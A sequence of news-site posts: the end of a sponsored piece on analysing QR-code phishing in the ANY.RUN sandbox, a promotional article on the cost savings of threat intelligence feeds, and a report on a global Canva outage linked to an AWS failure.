In 60 seconds, the sandbox discovered the full attack chain, surfacing relevant TTPs, exportable IOCs, network connections, and a shareable analysis report analysts can use to block, hunt, and write detections. 

Well-structured report generated by ANY.RUN for easy sharing 

Why SOC Analysts Choose ANY.RUN for Quishing Analysis 

Quishing attacks are built to waste analyst time; ANY.RUN gives that time back. With automated QR detection, real-time interaction, and deep visibility, analysts can shift from manual decoding to instant validation. 

• 90% of attacks exposed in under 60 seconds: The sandbox reveals hidden payloads, redirect chains, and credential-harvesting pages in seconds, cutting average triage time by more than half. 
• Full visibility in one interface: Analysts see process trees, network traffic, and decoded URLs together; no switching between tools, no risk of missing a step. 
• Automatic evidence collection: Every session generates IOCs, network indicators, and screenshots that can be exported or shared in a single click. 
• Faster detection engineering: Verified TTPs and IOCs can be turned into new detection rules directly from the sandbox report. 
• Safe handling environment: QR codes, phishing pages, and scripts execute only inside the isolated VM, analysts stay fully protected while observing real behavior. 
• Collaborative workflows: Share sessions across the team or integrate with your SIEM, SOAR, or ticketing system to accelerate incident response. 

Turn QR Phishing from a Blind Spot Into a 60-Second Investigation 

Quishing doesn’t only test your defenses but also your efficiency. Analysts spend hours decoding images, validating links, and correlating telemetry that should already be visible. 

ANY.RUN changes that balance, giving SOCs the kind of context they can act on instantly. 

With automation built into every stage of analysis, SOC teams using ANY.RUN report measurable results: 

• Up to 58% more threats identified overall, including those that bypass standard filters and static analysis. 
• 94% of users report faster triage, thanks to automated IOC collection and ready-to-share reports. 
• 95% of SOC teams speed up investigations, connecting decoded URLs, network traffic, and threat behavior in one workflow. 

Try ANY.RUN to uncover hidden phishing payloads, decode QR attacks safely, and turn every investigation into actionable insight. 

The post SOCs Have a Quishing Problem: Here’s How to Solve It  appeared first on Cyber Security News.

Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.​

Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.​

Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.​

Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.​

Five Strategies for Cost Savings with Threat Intelligence

TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

​Preventing Breaches Proactively

Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

Platforms such as ANY.RUN provides 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.​

Eliminating False Positive Waste

TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.​

Cutting Labor Costs Through Automated Triage

Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.​

Accelerating Response to Limit Damage

TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs—up to $100,000 per hour—and prevents revenue loss from prolonged incidents.​

Maintaining Up-to-Date Defenses Effortlessly

Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.​

It eliminates false positive waste by filtering alerts for verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing alert fatigue that plagues teams.​

Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.​

Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.​

Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.​

An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.​

Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.

Build Stronger Security With Fresh TI Data From 500,000 Analysts => Try Now

The post How Threat Intelligence Can Save Money and Resources for Businesses appeared first on Cyber Security News.

The disruption, linked to a broader Amazon Web Services (AWS) failure, has sparked frustration among users from India to the U.S., halting workflows for marketers, designers, and educators.

A Platform in Paralysis

The outage began escalating around 18:14 AEDT (03:44 IST), with Canva’s status updates confirming “Major Outage” across critical features: login, editing, saving, downloading, and sharing designs.

Mobile apps (iOS and Android), desktop versions (macOS and Windows), and integrations like Google Classroom and Moodle are also down. Even the Canva AI Connector, Apps SDK, and billing systems are affected, leaving users unable to access projects or seek support.

DownDetector has recorded over 15,000 user complaints in recent hours, with 20% citing server connection issues and 17% reporting app failures.

In India, where Canva is a go-to for festive graphics like Diwali campaigns, users expressed dismay on X: “Canva is down completely, app and web versions. Can’t log in,” one user posted. Another from the Philippines noted, “Ini-report ng netizens na hindi nila ma-access ang Canva ngayong Lunes.”

AWS at the Core

The root cause appears to be a failure in AWS’s US-EAST-1 region, where elevated error rates and latency were reported starting around 03:11 AM ET (12:41 IST).

Canva, heavily reliant on AWS’s cloud infrastructure, is among several platforms affected, though the impact on its 220 million monthly active users is particularly acute.

“Our team is actively investigating and working to restore full access as quickly as possible,” Canva’s status page states, a message unchanged since the initial alert.

On X, #CanvaDown is trending as users vent and share memes about stalled projects. A U.S. marketer tweeted, “Was supposed to launch promo campaigns… Canva down, chaos!” An Indian agency head added, “@canva what is happening? It is a critical day!” The outage’s timing is especially painful for small businesses and freelancers, with one user estimating thousands in lost productivity.

This marks Canva’s second major outage in six months, highlighting the risks of cloud-based platforms. As users wait for updates, the incident underscores the fragility of digital workflows. Canva advises checking its status page for progress, but for now, designers worldwide are left refreshing tabs and hoping for a swift fix. Updates will follow as more details emerge.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Canva Down – Suffers Global Outage, Leaving Millions of Users Unable to Access Platform appeared first on Cyber Security News.